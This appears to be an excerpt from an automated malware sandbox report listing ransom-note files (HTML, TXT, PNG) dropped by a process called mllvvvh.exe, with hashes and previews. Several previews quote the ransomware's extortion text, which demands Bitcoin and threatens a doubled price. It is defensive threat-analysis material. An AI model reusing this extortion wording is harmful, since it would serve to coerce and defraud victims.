                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Install\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\ClipSVC\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\downloads\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrccache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
